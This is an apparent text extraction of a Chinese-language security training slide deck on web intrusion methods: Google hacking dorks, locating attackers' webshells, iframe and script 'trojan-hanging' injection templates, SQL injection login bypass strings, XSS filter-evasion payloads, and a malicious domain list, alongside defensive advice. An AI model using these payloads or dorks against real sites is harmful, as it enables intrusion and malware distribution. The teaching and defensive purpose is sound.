<4D F736F F F696E74202D20BAF4B8F4A7F0A8BEBED4A4A A44AAB49A4E2AA6BA4C0AA525FC1BFB8712E >

Size: px
Start display at page:

Download "<4D F736F F F696E74202D20BAF4B8F4A7F0A8BEBED4A4A A44AAB49A4E2AA6BA4C0AA525FC1BFB8712E >"

Transcription

1 網路攻防戰之 Web 入侵手法分析 MCP ( 微軟認證專家 ) MCSA ( 系統管理師 ) MCDBA ( 資料庫管理師 ) MCSE ( 系統工程師 ) BS7799 LA 國際資訊安全證書 TCSE( 趨勢防毒認證資訊安全專家 ) FOUNDSTONE Security Professional( 駭客終結者認證 ) 中華專案管理學會證書 微軟資訊安全講師 微軟 E 化管理大師 微軟企業化管理大師 台灣網路危機處理中心 (TWCERT) 受訓證書 網路封包互動判讀認證 Class C 1

2 注意事項 部份簡報為節省版面, 請點選各張簡報標註之超連結自行參閱 本場次的 Demo 示範因場地之限 Demo 時無法再將字形及畫面放大, 想要抄筆記的同學請盡量往前坐 本場次示範之手法為避免煽惑他人犯罪, 部分破壞性資訊例如 : 關鍵參數 語法已做相關隱藏處理 本場次示範所使用之惡意軟體受限於相關法律規定請勿索取 議程 2

3 利用知名搜尋引擎尋找目標 Web Server 搜尋引擎的風險 網站攻擊者思考 基本 進階 其它語法與關鍵字 搜尋存在漏洞的網站 查找別人留下來的 Webshell 後門 自動化 Google Hacks 工具 如何防止 Google Hacks 搜尋引擎的風險 By 使用者 搜尋 關鍵字 的結果可能讓使用者連入 與真網站網址或網頁內容相似的 偽冒 ( 假 ) 網站 例如 : vs 例如 : vs 已被駭客植入惡意連結 ( 木馬 ) 的 官方 ( 真 ) 網站 例如 : 知名部落格所公告的網站 3

4 搜尋引擎的風險 By 網站管理者 在架設網站過程中, 設計者將該網站會使用到的 網頁 圖片 影音檔案 文件 檔案型式的資料檔案型式的資料庫 (access) 貪圖超連結或檔案上下傳的方便性, 採用 一個實體資料夾就是一個網站的設計 在這樣的網站設計與架設的概念下, 如果該網站之網頁存取權限或實體的資料夾檔案權限控管不當, 攻擊者只要猜測或使用工具取得該網站內資料夾或檔案文件名稱, 便可從 Internet 下載存放於該網站 ( 資料夾 ) 內本屬不應公開的文件或資料庫 網站攻擊者思考之一 : 網頁名稱與路徑 猜測首頁名稱 :index default 等 猜測管理名稱 :admin login manage edit adminuser main adminmain 等 虛擬目錄 / 資料夾名稱 :photo image admin user script db user 等 預設路徑 : IIS:c:\inetpub\wwwroot Apache: /usr/local/apache 防禦對策 : 變更採用不易識別的名稱或路徑 4

5 網站攻擊者思考之二 : 工具與掃描 使用工具 : 砍站軟體 Web 弱點掃描軟體 駭客工具之後台掃描軟體 駭客工具之注入軟體 使用時機 : 網頁名稱與路徑猜測命中率太低時 使用風險 : 大量且及時的掃描易被防禦設備阻擋或封鎖 IP 規避風險 : 使用 proxy 不停更換 IP 少量掃描 分段掃描 分時掃描 用跳版 ( 肉雞 ) 掃描 使用 DDoS 讓防禦設備 ByPass 針對漏洞攻擊而不使用掃描( 例如 :SQL Injection XSS CGI 漏洞 ) 防禦對策 : 調整防禦設備對 Web 攻擊的敏感度 增加檢視閘道端或伺服器端 LOG 的頻率 網站攻擊者思考之三 :Google Hacks 水可以載舟, 亦可以覆舟, 搜尋引擎雖然為企業網站增加曝光度, 但強大的搜尋技術卻也讓企業不想曝光的網站弱點與機密資訊一一現形, 造成駭客攻擊的索引指南或內部資料外洩 而駭客或一般人使用搜尋引擎尋找資料 ( 難度很低 又不需懂太多技巧 ), 會在 有意 或 無意 間取得網站的不想公開的資料超連結, 進而下載轉存 針對非以網站為主要商務往來之中小型企業, 其成功率高且被發現攻擊的風險低, 是駭客攻擊前收集目標資料的好方法 5

6 手法缺點 : 對目標明確的單一目標網站目標網站 ( 例 : 政府 金融網站 ) 成功率不見得高, 僅適合攻擊前灑網捕魚, 來尋找具有 Web 漏洞的網站作為參考 對剛架設的新生兒網站或舊網站卻剛新增的網頁資料會找不到相關搜尋的索引資料 6

7 基本語法與關鍵字 site: ( 搜尋特定網址 ) inurl: ( 搜尋特定連結 ) intext: ( 搜尋網頁內文字 ) intitle: ( 搜尋網頁標題 ) filetype: ( 搜尋特定檔案格式 ) link: ( 搜尋互相連結的網頁 ) index of ( 搜尋開放目錄瀏覽 ) cache: ( 顯示網頁在 google 中的暫存資料 ) 進階語法與關鍵字 "access denied for user" "using password" "Index of /backup" allinurl: admin mdb inurl:passlist.txt " -FrontPage-" ext:pwd inurl:(service authors administrators users) "ASP.NET_SessionId" "data source=" "AutoCreate=TRUE password=*" "Index of /" +password.txt "Index of /password" "mysql dump" filetype:sql "pcanywhere EXPRESS Java Client" "VNC Desktop" inurl:5800 "phpmyadmin MySQL-Dump" "INSERT INTO" -"the "phpmyadmin MySQL-Dump" filetype:txt t t "phpmyadmin" "running on" inurl:"main.php "robots.txt" "Disallow:" filetype:txt intitle:"remote Desktop Web Connection" inurl:tsweb intitle:"welcome to Windows 2000 Internet Services" inurl:"printer/main.html" intext:"settings intitle:index.of administrators.pwd 7

8 其它語法與關鍵字 Johnny ihackstuff Google Hacking Database (GHDB) 找尋 Vulnerable Servers 語法 =summary&cat=9 找尋 Web Server Detection 語法 =summary&cat=7 搜尋存在漏洞的網站之一 搜尋 URL 網址中含有 asp?id= 或 php?id= 語法為 inurl:asp?id= 或 inurl:php?id= 原因為類似這樣的 URL 傳值是最容易有 SQL Injection 的網頁 但並不是凡是這樣撰寫網頁應用程式均有 SQL Injection 的漏洞, 只是以攻擊者的角度來想, 搭配搜尋引擎的尋找常見的 SQL Injection URL 語法可以降低在茫茫大海撈針中一個一個猜測網站的時間, 再搭配一些 Google Hacks 的組合搜尋字串, 很快就可找到入侵的目標網站 8

9 搜尋存在漏洞的網站之二 y y 手工測試目標網站是否具有SQL Injection 於 於 asp?id= 之後加入下列情中一種語法 p 之後加入下列情中 種語法 asp?id=and 1=1 或 asp?id= and 1=1- asp?id=and 1=2 或 asp?id= and 1=2- - y y 來判斷輸入於asp或php在=之後的值該資料庫接不接 受 如果能夠順利過關使得該asp或php程式沒有出現 錯誤訊息 就表示該程式具有SQL Injection的漏洞 註 此判斷法並非百分百能夠判斷出網站是否真的有 SQL Injection 原因是如果程式在前端Script或後端 DB的預存程序中有做字串或傳值變數的檢查就會失敗 9

10 查找別人留下來的 Webshell 後門之一 WebShell: 簡單就是一個 asp 或 php 木馬的後門程式 該程式就是撰寫 asp 或 php 語法並已經添加好各種可以控制的指令撰寫出來的一個 Web 介面的檔案總管 ( 具有 FSO 功能 ) 利用各種漏洞將此文件上傳放置於 Web Server 的根目錄中, 與正常的 asp 或 php 程式檔案混在一起 然後攻擊者就可以用 Web 的方式透過該 asp 或 php 木馬來控制 Web Server, 包含上下載文件 新增帳號 添加其它木馬或添加 <iframe> 於網頁中特稱為 掛馬 查找別人留下來的 Webshell 後門之二 FileSystemObject(FSO): 檔案系統物件 (FSO) 模型提供用來處理資料夾及檔案的物件架構工具 此模型可讓您使用熟悉的 object.method 語法及大量的屬性 (Property) 方法及事件來處理資料夾及檔案 您也可採用傳統 Visual Basic 陳述式及指令 FSO 模型使您的應用程式能夠建立 變更 移動及刪除資料夾, 或決定是否有特定資料夾存在及存在於何處 而且還能讓您取得關於資料夾的資訊, 諸如資料夾名稱及建立或最後修改的日期 10

11 參考資料 : 使用 FileSystemObject 存取檔案 microsoft com/library/cht/default asp?url /library/cht/ vbcn7/html/vbconintroductiontofilesystemobjectmodel.asp 使用 ASP 與 Scripting.FileSystemObject 來建立動態目錄頁 如何使用 ASP 建立檔案檢視器 如何使用 ASP 建立目錄檢視器 11

12 查找別人留下來的 Webshell 後門之三 使用 WebShell 的優點 : 因透過 80 port 所以可以穿越防火牆 因為是在 Web Server 上透過 asp 或 php 程式來執行指令或語法, 所以閘道端的防禦設備不會攔截 不會在閘道端 系統留下 LOG, 只有 Web Server 與 DB 上的 LOG 會出現該 asp 或 php 程式有執行的記錄, 但權責分工之下 ( 網頁程式設計者 資料庫管理師 Web Server 管理員 資安人員 ) 沒有經驗的管理者或團隊很難判讀 LOG Web 植入木馬 ( 掛馬 ) 通常都是只有把植入的語法拿掉而已, 如果沒有刪除 真正在運作的 WebShell, 那再次掛馬指日可待 查找別人留下來的 Webshell 後門之四 使用 WebShell 的缺點 : 最關鍵的步驟為 : 如何把 WebShell 上傳至目標 Web Server 的目錄之下 常利用的手法 : 1. 利用 Web Server 本身的漏洞 ( 最好用手法 ) 2. 利用 SQL Injection 的漏洞搭配其他上傳指令或 tftp 工具 ( 最常見手法 ) 3. 利用 XSS 語法使網頁設計師的電腦中木馬, 使其在更新網頁檔案時一並更新進去 Web Server 12

13 查找別人留下來的 Webshell 後門之五 攻擊者入侵某一個網站順利得到 WebShell 之後, 並不會把它殺掉 也不會把該 WebShell 的某些關鍵字加入排除搜尋引擎建立 Index 的索引檔 ( 因為這是 Web 管理者要做的事 ) 所以只要不是才剛剛入侵成功的 WebShell( 因為搜尋引擎沒有資料 ), 通常透過 WebShell 的某些關鍵字 就可找到 前人留下的智慧與寶藏 註 : 如果是剛剛才入侵成功的網站, 可用 網頁名稱與檔案建立日期 來猜測, 搭配砍站工具或 Web 掃描工具就可發現 多出來 的蛛絲馬跡 查找別人留下來的 Webshell 後門之六 常見 WebShell 檔名 :( 註 : 攻擊者可改檔名 ) diy.asp ( 網站小助手 ) wei.asp 2006.asp newasp.asp myup.asp Log.asp phpspy.php 13

14 自動化 Google Hacks 工具 ( 免費軟體 ) Wikto SiteDigger 需要 Google Web APIs license key( 已停止申請 ) 每個使用授權每日僅能呼叫 1000 次, 而且每次的查詢結果僅回傳前 1000 筆, 回傳則以最多 10 筆為一個單位, 而搜尋內容則不包括圖片 新聞等其他內容, 僅限於網頁資料, 如此設計均是為及提昇執行效能所做的考量 自動化 Google Hacks 工具 ( 駭客軟體 ) Alt-Google Google 蜘蛛 : 語法掃描 : 語法掃描 Google Hack V2.0 : 協助 Web 搜尋用 挖掘雞 or 挖掘機 : 掃描語法並獲得目標網站網址, 並依預先設定好的條件找到可入侵的網站 14

15 如何防止 Google Hacks 之一 在網路伺服器上, 增加一個 robots.txt 然後在這個檔案中加入 User-agent: allow: Disallow: 這參數進行設定, 一般來說都可以阻止有道德的搜尋引擎程式讀取並儲存您的網頁 User-agent:Googlebot Disallow:/*.mdb$ User-Agent:yahoobot Disallow:/*.mp3$ User-agent:* Disallow:/*.* 如何防止 Google Hacks 之二 可以在網頁的 HEAD 區段中, 加入一些特殊的 HTML META TAG 標籤, 來指出某一個網頁是否可以被索引 分析或鏈接 例如你可以加入 <META NAME= ROBOTS CONTENT= NOINDEX > 表示 : 不希望搜尋引擎處理 儲存這個網頁 <META NAME= ROBOTS CONTENT= NOARCHIVE > 表示 : 希望搜尋引擎處理這個網頁, 但是不儲存網頁, 也就是說, 不會有庫存頁 <META NAME= ROBOTS CONTENT= NOFOLLOW > NOFOLLOW 表示 : 希望搜尋引擎處理這個網頁, 但是不繼續處理這個網頁中另外連結的網頁 <META NAME= ROBOTS CONTENT= NOINDEX,NOFOLLOW > 表示 : 不希望搜尋引擎處理 儲存這個網頁, 以及這個網頁中另外連結的所有資訊 15

16 如何防止 Google Hacks 之三 將敏滿性的網頁資料檔案或目錄移動到網路伺服器可以存取的檔案或目錄範圍或乾脆刪除該檔案而不要放至於 Web Server 中 在網路伺服器上, 將該網頁檔案或目錄的設定讀取權限設為保護或需密碼才能讀取 採用 https: 安全加密或鑲嵌憑證的方法存取機密性網頁 做好網頁程式 (asp php jsp 等 ) 的安全驗證, 即使被找到機密網頁也能確保在權限等安全控管技術之下, 不被進入網頁中存取資料 Google Hacks 相關參考網址 搜尋引擎過濾單位機密資料方法 從 Google 的索引中移除我的內容 實戰設計 robots.txt 與標籤 知名搜尋引擎 Web 入侵手法 hacker.blogspot.com/2007/01/web.html com/2007/01/web html Google Hacks 入侵你家的網路監視器! 16

17 Web Server 入侵手法 Microsoft 漏洞利用 網頁木馬 論壇套件漏洞利用 SQL Injection 利用 XSS 利用 Microsoft 漏洞利用 MS07-004: 向量標記語言中的弱點可能會允許遠端執行程式碼 (929969) tin/ms mspx MS07-017: GDI 中的弱點可能會允許遠端執行程式碼 (925902) tin/ms mspx MS07-020: Microsoft Agent 中的弱點可能會允許遠端執行程式碼 (932168) tin/ms mspx MS07-029: Windows DNS RPC 介面的弱點可能會允許遠端執行程式碼 (935966) tin/ms mspx 17

18 18

19 網頁木馬 網頁木馬就是將木馬和網頁結合在一起, 打開網頁的同時也會執行木馬 最初的網頁木馬原理是利用 IE 瀏覽器的 ActiveX 控制項, 執行網頁木馬後會彈出一個控制項下載提示, 只有點擊確認後才會運行其中的木馬 這種網頁木馬在當時網路安全意識普遍不高的情況下還是有一點使用價值的, 但是其缺點是顯而易見的, 就是會出現 ActiveX 控制項下載提示 當然現在很少會有人去點選那莫名其妙的 ActiveX 控制項下載確認視窗 在這種情況下, 新的網頁木馬誕生了 這類網頁木馬通常利用了 IE 瀏覽器或系統的漏洞, 在運作執行的時候沒有絲毫提示, 因此隱藏性極高 19

20 網頁木馬的類別 原生型木馬 : 此種木馬本身就是一個完整的遠端控制型的木馬程序, 不需要依賴漏洞 例如 : 灰鴿子 漏洞型網頁木馬 : 必須依賴系統 瀏覽器 應用程式的漏洞才能產生感染及植入的惡意行為 例如 : MS07017 asp 或 php 網頁木馬 : 該程式就是撰寫 asp 或 php 語法並已經添加好各種可以控制的指令撰寫出來的一個 Web 介面的檔案總管 可分為含 FSO 與不含 FSO 的網頁木馬 一句話網頁木馬 : 只利用一行語法來傳值的木馬 例如 :<%eval request( value )> 網頁木馬流程 駭客 知名的官方網站 [ 上傳 ] 具 FSO 功能的網頁木馬 不知情的一般使用者 首頁 [ 掛馬 ] 將首頁或其他網頁植入 <ifrme> 隱藏框架引導到跳版網站 跳版網站 原生型木馬漏洞型網馬 20

21 網站 網頁掛馬 掛馬 : 掛馬這個行為就是駭客採用 系統漏洞 網頁漏洞 SQL Injection XSS 等技巧入侵了一些網站後, 將自己編寫的網頁木馬語法嵌入被駭網站的主頁中, 利用被駭網站的流量將自己的網頁木馬傳播開去, 以達到自己植入真正木馬的目的 註 : 也可能先入侵後再上傳具有 FSO 功能的網頁木馬稱為 WebShell, 再利用該木馬將其它正常網頁 掛馬 好處是只要原來的 WebShell 不被殺掉, 就可一直重複掛馬 網站 網頁掛馬語法 框架掛馬 : <iframe src= 木馬網址 width=0 height=0></iframe> JScript 文件掛馬 : 首先將以下語法存檔為 xxx.js 然後將此文件利用各種方式上傳到目標處 document.write("<iframe width='0' height='0' src=' 木馬網址 '></iframe>"); 最後 JScript 掛馬的語法為 : <script language=javascript src=xxx.js></script> JScript 變型加密 : <SCRIPT language= JScript.Encode src= muma.txt 可改成任何附檔名 body 掛馬 : <body onload="window.location=' 木馬網址 ';"></body> 隱藏掛馬 : top.document.body.innerhtml = top.document.body.innerhtml + '\r\n<iframe src=" 21

22 CSS 中掛馬 : 先將製作好的 muma.js 先利用各種方式上傳至目標處 body { background-image: url('javascript:document.write("<script src= JAVA 掛馬 : <SCRIPT language=javascript> window.open (" 木馬網址 ","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script> 圖片偽裝 : <html> <iframe src=" 網馬網址 " height=0 width=0></iframe> <img src=" 圖片網址 "> </html> 偽裝呼叫 : <frameset rows="444,0" cols="*"> <frame src=" 開啟的網頁 " framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"> <frame src=" 網馬網址 " frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"> </frameset> 欺騙超連結網址手法 : <a href=" 迷惑他人超連結網址, 故意顯示這個網址卻連向木馬網址 )" onmouseover="www_163_com(); return true;"> 網頁要顯示的內容 </a> <SCRIPT Language="JavaScript"> function www_xyz_com () { var url=" 真正連的網頁木馬網址 "; open(url,"newwindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,r esizable=no,copyhistory=yes,width=800,height=600,left=10,top=10"); } </SCRIPT> 論壇套件漏洞利用 由於 asp 或 php 簡單易學, 所以網路常常可找尋到相關免費的程式架設論壇網站 但由於安裝程式的管理者常忽略需要修改原始設定及安全性選項, 使得依照 預設值 ( 瘋狂按下一步就會裝好 ) 的資料便可取得該論壇權限, 進而利用 社交工程 取得個人資料 常利用手法 : Cookie 欺騙 爆庫法 : 論壇 DB 爆庫 爆庫法 :%5c 路徑爆庫 SQL Injecion XSS 惡意超連結至網頁木馬 DDoS 22

23 Cookie 欺騙 Cookie 記錄著使用者的帳戶 ID 密碼之類的訊息, 如果在網上傳遞, 通常使用的是 MD5 方法加密 這樣經由加密處理後的訊息, 即使被網路上一些別有用心的人截獲, 也看不懂, 因為他看到的只是一些無意義的字母和數字 然而, 現在遇到的問題是, 截獲 Cookie 的人不需要知道這些字串的含義, 他們只要把別人的 Cookie 向伺服器提交, 並且能夠通過驗證, 他們就可以冒充受害人的身份, 登陸網站 這種方法叫做 Cookie 欺騙 手法 : 截獲他人 Cookie 內的帳號與密碼獲取權限, 搭配其它手法進行 掛馬 等更進一步攻擊 23

24 爆庫法取得資料庫 名詞解釋 : 原為大陸用語是指利用強行的手段, 例如 : 在網址列添加特殊字串或路徑, 使目標網站的資料庫實體路徑暴露出來, 進而成功下載該資料庫, 取得帳號密碼等權限之過程 常見手法 : 利用論壇套件其資料庫均固定放至於某 虛擬目錄 中之特性, 輸入關鍵字後下載 ( 註 : 以 access 型態之資料庫居多 ) 把網址列中的 / 換成 %5c 然後送出該網址, 就可以在 Web Server 的錯誤訊息中得到資料庫的實體路徑 註 : 目前只要更新使用新版的論壇套件, 幾乎都已經修正相關弱點 論壇 DB 爆庫 : 原理 Access 資料庫的儲存隱患 : 在 ASP+Access 應用系統中, 如果能獲得或猜到 Access 資料庫的儲存路徑和資料庫名稱, 則該資料庫就可以被下載到本地 例如 : 對於線上書店的 Access 資料庫, 人們一般命名為 book.mdb store.mdb 等, 而存儲的路徑一般為 URL/database 或乾脆放在根目錄 URL/ 之下 這樣, 只要在瀏覽器地址欄中輸入網址 : URL/database/store.mdb, 就可以輕易地把 store.mdb 下載到本地的機器中 Access 資料庫的解密隱患 : 由於 Access 資料庫的加密機制非常簡單, 所以即使資料庫設置了密碼, 解密也很容易 由此可見, 無論是否設置了資料庫密碼, 只要資料庫被下載, 其資訊就沒有任何安全性可言了 24

25 論壇 DB 爆庫 : 解決方案 非常規命名法 : 不要簡單地命名為 book.mdb 或 store.mdb, 而是要起個非常規的名字, 例如 :faq19jhsvzbal.mdb, f b l 再把它放在 如./akkjj16t/kjhgb661/acd/avccx55 之類的深層目錄下 使用 ODBC 資料來源 : 使用 ODBC 資料來源, 不要把資料庫名稱直接寫在 ASP 程式碼中, 例如 : DBPath = Server.MapPath(./akkjj16t/kjhgb661/acd/avccx55/faq19jhsvzbal.mdb ) conn.open driver={microsoft Access Driver (*.mdb)}; dbq= & DBPath 改成 : conn.open ODBC-DSN 名稱 就不會發生這樣的問題了 在 IIS 的設定 : 將放置 Access 資料庫的資料夾 ( 或虛擬目錄 ) 給予 寫入 但不要給予 讀取 的權限即可, 如此一來, 就算知道儲存路徑和資料庫名稱, 一樣無法從 Web 下載 在主目錄 應用程式設定 應用程式對應 新增 執行檔 : C:\WINNT\System32\inetsrv\ism.dll 副檔名 :.mdb 限制於 :GET,POST ( 缺點 : 以後要編修 Access 資料庫, 很容易忘記有鎖權限或鎖副檔名 ) 25

26 %5c 路徑爆庫 : 原理 它不是網頁本身的漏洞, 而是利用了 IIS 解碼方式中的一個特性, 如果 IIS 安全設定不周全, 而網頁設計者及管理者未考慮 IIS 錯誤時, 就會被人利用 為何要用 "%5c"? 實際上它是 "\" 的十六進位代碼, 也就是 "\" 的另一種表示法 基本上 IE 會自動在網址列就把 "\" 轉變成 "/" 的符號, 使得瀏覽到同一個網址 但是, 當我們把 "/" 換成十六進位寫法 "%5c" 時,IE 卻不會對此符號進行轉換, 問題正是出在這裡 26

27 一個典型的 conn.asp 連線語法中如下 :DBPath = Server.MapPath("db/dsvote.mdb") 當 瀏覽呼叫 conn.asp 時, 就會在 IIS 解析成 /vote\votelist.asp 在 IIS 中, / 和 \ 代表著不同的意義, 遇到了 \ 時, 認為它已經到了根目錄所在的實體路徑便不再往上層解析, 於是 ASP 就會出錯將網站的完整的實體路徑加在錯誤訊息裡 : 'C:\Inetpub\wwwroot\STORE\mood#.asa 註 : 將 mood#.asa 改名為 mood.mdb %5c 路徑爆庫 : 解決方案 修改程式 : 在 conn.asp 檔中呼叫資料庫語法之後要加上 On Error Resume Next 的語法, 它的意思是出錯後, 繼續執行下面語法, 也就是不理會出錯, 當然就不會給出資料庫的錯誤資訊了 修改 Web Server 回報錯誤的畫面 : 在 IIS 內的虛擬目錄 -> 內容 -> 自訂錯誤 -> 選擇錯誤編號 - > 編輯內容 換到預設的網頁即可 27

28 其它套件路徑暴露 本地原產 : ANN 公告系統 : For Unix/Linux, Apache + php + mysql ( 典型的 LAMP) 是一個用 PHP 撰寫的公告程式, 主要用來發佈公告, 作者是 Charles Nextime 因作者本身也是教育從業人員, 所以廣受各教育單位使用該 ANN 公告套件 目前最終版 : V1.29 ( 已不再更新 ) 其它套件路徑暴露 : 原因 於該 index.php 程式碼中的判斷式 if (isset($nuke_dir) && $usenuke == 1) { include("$nuke_dir/mainfile.php"); include("$nuke_dir/header.php"); } 指定了 include 的檔案, 這時只要不按照它的邏輯, 即可使該 php 程式發生錯誤, 顯示檔案路徑 28

29 其它套件路徑暴露 : 解決方案 修正該公告套件為最終版 修正該公告套件的程式語法 在 php.ini i 文件中將下列參數關閉 global_registers = off allow_url_fopen = 0 修改 Apache 遇到 php 程式錯誤時出現的錯誤畫面 例如 : 有任何錯誤都導向一個固定的畫面 註 : 該公告套件於 Index.php 有暴露路徑漏洞 log.inc.php 有 RemoteFileInclude(RFI) 遠端文件引入漏洞, 可利用它植入 WebShell 29

30 SQL Injection 利用 引起的原因為網頁程式設計師在撰寫 asp 或 php 程式的時候, 對呼叫 (ADO 連線 ) 後端資料庫的帳號權限太大, 在加上對特殊字串以及語法沒有過濾或者過濾不完全而導致的 其最主要的攻擊目標為資料庫, 以取得下列資訊為主 : 獲取資料庫帳號及密碼 獲取作業系統帳號及密碼 利用 XP_CmdShell 執行 DOS 指令 猜測網頁實體路徑來進行換首頁或上傳 / 下載文件 上傳網頁木馬並植入後門 SQL 條件式語法漏洞 主要出現在登入帳號的 asp 或 php 程式上, 利用這個漏洞就可以不需要帳號密碼進入管理畫面 主要為網頁程式設計的瑕疵 : 沒有對單引號 或雙引號 '' 進行過濾 SQL 條件式 and or 的邏輯沒有考慮 SQL 語法的 where 子句所傳入的變數沒有檢查 SQL 語法中 -- 是表示該符號之後的語法或參數變成註解 語法 : or = or a'or'1=1- - 'or1=1- - ''or1=1- - or1=1- - 'ora ='a or = a = a ')or( a ='a 30

31 網頁應用程式語法 : 有問題版 sql_cmd = "select * from mydatabase where id='" & Request("id") & "' and passwd='" & Request("passwd") & "' 傳入惡意語法後 sql_cmd = "select * from mydatabase where id='" 'or 1=1 -- "' and passwd='" & Request("passwd") & "' 則變成前面的 where 條件為 1=1 而後面的 password 則因 -- 變成註解, 所以就不用密碼可進入 網頁應用程式語法 : 修正版 以程式設計的觀點來看, 將表單或查詢字串直接帶入 SQL 語法, 是一切弊病的源頭, 要徹底排除 SQL 資料隱碼攻擊, 必須從根源對症下藥 也就是必須在取得表單資料後, 針對單引號進行過濾, 然後再組合為 SQL 語法, 例如 : sql_cmd = "select * from mydatabase where id='" & Request("id") & "' and passwd='" & Request("passwd") & "'" 應該改為 myid = Replace(Request("id") ),"'","'+chr(34)+'") ) mypwd = Replace(Request("passwd"),"'","'+chr(34)+'") sql_cmd = "select * from mydatabase where id='" & myid & "' and passwd='" & mypwd & "'" 31

32 SQL Injection 相關參考網址 SQL Injection ( 資料隱碼 ) 駭客的 SQL 填空遊戲 G1.htm G2.htm 資料隱碼 SQL Injection 的因應與防範之道 tm ASCII 碼對照表 SQL Injection 檢測工具 ( 無殺傷力 ) XSS 利用 Cross Site Scripting(XSS) 跨網站功擊 : XSS 產生的原因是由於網頁程式設計師在撰寫程式時, 對於一些變數沒有充份過濾, 直接把使用者所送出的資料送往 Web Sever 執行 這樣的程式流程造成攻擊者可以送出一些特別製造的 Script 語法, 只要成功送往後端執行成功, 便可達成如 : 竊取 cookie 植入網頁木馬等原本不存在的 功能 32

33 XSS 的探測和繞過過濾 基本檢測語法 : <script>alert( xss )</script> 如果 <script> 被過濾, 則改用 <img src=javascript:alert( xss )> 如果 javascript: 被過濾, 則用 16 進位的值取代一些關鍵字 <img src= javascrip&#116&#58alert(/xss/) > 也可用空白字元 Tab 添加 <img src= javas cript:alert(/xss/) width=0> 或者用語法的事件與屬性來避免關鍵字被攔截 <img src= # onerror=alert(/xss/)> <img src= # style= xss:expression(alert( xss )); > 例如 :Yahoo Mail 的 XSS 語法 ( 已修正 ) <STYLE onload= alert( cookies exploit! );alert(document.cookie) > XSS 相關參考網址 Cross Site Scripting questions and answers Apache Cross Site Scripting Info How to prevent cross-site scripting security issues Information on Cross-Site Scripting Security Vulnerability rssite.mspx?mfr=true Microsoft Anti-Cross Site Scripting Library V1.0 =9A2B9C92-7AD9-496C-9A89- AF08DE2E5982&displaylang=en 33

34 Web Server 防禦策略 網頁木馬流程阻擋點之一 網頁木馬流程阻擋點之二 網頁木馬流程阻擋點之三 網頁木馬流程阻擋點之四 惡意連結網站清單 駭客入侵流程分析 34

35 網頁木馬流程阻擋點之一 駭客 知名的官方網站 [ 上傳 ] 具 FSO 功能的網頁木馬 首頁 不知情的一般使用者 跳版網站 阻擋策略 : 設備 網頁應用程式防火牆 封鎖異常來源 IP 入侵偵測系統 IDS/IDP 觀察異常封包 服務 搜尋引擎的阻擋 弱點掃描 滲透測試 防毒牆 ( 由外到內 ) 阻擋傳入的木馬 35

36 36

37 網頁木馬流程阻擋點之二 駭客 知名的官方網站 [ 上傳 ] 具 FSO 功能的網頁木馬 不知情的一般使用者 首頁 [ 掛馬 ] 將首頁或其他網頁植入 <ifrme> 隱藏框架引導到跳版網站 跳版網站 阻擋策略 : 設備 SUS / WSUS 修補系統漏洞 Web DB 的權限控管 企業型防毒軟體及防間諜軟體 LOG 及事件分析軟體 服務 搜尋引擎的阻擋 弱點掃描 滲透測試 程式碼檢測 檢視與設定資料夾權限 移除不需要及罕用的服務 變更系統與 Web 相關預設值 Web 與 DB 的備份軟體 37

38 網頁木馬流程阻擋點之三 駭客 知名的官方網站 首頁不知情的一般使用者 跳版網站 原生型木馬 漏洞型網馬 阻擋策略 : 設備 網頁應用程式防火牆 封鎖異常來源 IP 入侵偵測系統 IDS/IDP 觀察異常封包 服務 收集易被植入或經常感染的網址成為黑名單 防毒牆 ( 由內到外 ) 阻擋傳輸的木馬 Proxy Server 的黑白名單 網址過濾或攔截的設備與軟體 38

39 網頁木馬流程阻擋點之四 駭客 知名的官方網站 不知情的一般使用者 跳版網站 阻擋策略 : 設備 Windows Update / Microsoft Update 修補系統漏洞 單機型防毒軟體及防間諜軟體 個人單機型防火牆 服務 善用線上掃毒比對不同防毒 本機 HOSTS 惡意網址清單 改用其它瀏覽器可以改善 ( 但不能完全避免 ) 網頁瀏覽安全防護軟體 個人資料的備份軟體 39

40 惡意連結網站清單 為了避免瀏覽網頁時中毒, 你可以將 惡意連結網站清單 中的網址做以下之處理 第一個方法 : 加入本機 HOST 檔案 適合 : 一般家用使用者於本機電腦中加入 缺點 : 在一般公司中有超過 10 台以上電腦,MIS 大概就會累到不會想處理 在 [ C:\WINDOWS\system32\drivers\etc ] 加入此 hosts 檔案 惡意連結網站清單 如果不會設定 hosts 這個檔案, 知名部落格已經將所有的清單放進 hosts 檔案, 可以直接下載 hosts 檔案並蓋掉原來的 更新日期 15:42 將它解壓縮到 %SystemRoot%\system32\drivers\etc 資料夾下 ( 在 Windows XP,%SystemRoot% 代表 c:\windows,c:\ 是系統磁碟機代號 ) 網站黑名單 ( 大砲開講 BLOG 提供 ) /04/24 更新 Hosts 檔案 (Malware-Test Lab 提供 ) /04/24 更新 40

41 第二個方法 : 將惡意網站網址加入到瀏覽器的 限制的網站 中 適合 : 一般家用使用者於本機電腦中加入 缺點 : 在一般公司中有超過 10 台以上電腦,MIS 大概就會累到不會想處理 或者說 IE 已經玩爛了, 根本不會想管 第三個方法 : 在有網域情況下利用 [ 群組原則 ] 將惡意網站網址加入到瀏覽器的 限制的網站 中, 當使用者登入網域時自動套用 適合 : 一般企業使用者於加入網域的電腦中使用, 使用者只要登入網域就會自動有此功能 缺點 : 在沒有網域的企業中, 例如 : 工作群組的環境中無法使用 會有例外的電腦例如 :NB 使用者打死不加入網域那也會破功 41

42 第四個方法 : 採購具有攔截惡意網址的閘道端設備, 例如 : 防毒牆 UTM 網址過濾器 Proxy Server 等 適合 : 一般企業使用者於沒有網域的電腦中使用, 使用者只要經閘道端上網就會自動判斷並攔截有惡意的網址 缺點 : 如果沒有編列預算時, 一般來說這樣的設備並不便宜 也許可以改用開放源碼解決方案中的其他功能取代, 但需要 MIS 經常維護 也會有例外的電腦, 例如 :NB 使用者可能在公司之外的任何地方上網, 並不能保證其他地方也有相關的閘道端防禦設備可以阻擋, 成為防禦死角 2008/09~10 月新增惡意掛馬網址鏈結 www3.ss11qn.cn 1.cool0.biz fuckuu.fs xx.com dnd.3322.org real.kav2008.com gf.ccves.cn good00.net adasas.cn net yeapple.com xyxy68.8u8.net winzheng.126.com girlchinese.com net youlove.3322.net tty.yyun.net i5t.cn page.taobao.com search.taobao.com taobao.com Isw.com ave2.cn 資料來源 天罣 : 42

